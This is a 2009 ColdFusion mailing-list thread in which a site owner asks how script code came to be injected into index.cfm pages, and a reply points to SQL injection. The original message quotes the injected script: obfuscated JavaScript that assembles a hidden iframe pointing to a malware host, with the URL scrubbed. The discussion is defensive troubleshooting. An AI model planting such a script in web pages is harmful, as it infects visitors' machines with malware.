William, That's a great post - we're re-reading it now. However, this situation seems to be code in the index.cfm page, not something being appended from the db. So, I'm not sure if that post will be relevant in this case.
Thoughts? N > -----Original Message----- > From: William [mailto:[email protected]] > Sent: Monday, April 06, 2009 3:50 PM > To: cf-talk > Subject: RE: Question about hack > > > Do a search on this list for 'exec(' > There was a big todo about this last summer. Probably in > your database > > > > -----Original Message----- > From: Nick Gleason <[email protected]> > Sent: Monday, April 06, 2009 2:19 PM > To: cf-talk <[email protected]> > Subject: Question about hack > > > Hi there. We've just seen a hack attempt that we haven't > seen before and I wanted to get feedback. > > The symptom is that some script code is inserted at the > bottom of certain pages (e.g. index.cfm). The script (which > has been scrubbed) looks like > this: > <script><!-- > var applstrna0 = "<if"; > var applstrna1 = "rame src=http://said7";; > var applstrna2 = ".[BAD URL HERE]"; > var applstrna3 = " width=100 height=0></i"; > var applstrna4 = "frame>"; > document.write(applstrna0+applstrna1+applstrna2+applstrna3+app > lstrna4); > //--></script> > > The script downloads malware, which we obviously want to > prevent. We're trying to determine how it's getting in > their, whether through an old site with inadequate code or > the OS or something else. Any thoughts? > > This is on a server running IIS 6 / CF7. > > Thanks in advance, > > Nick > > > > > > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321366 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
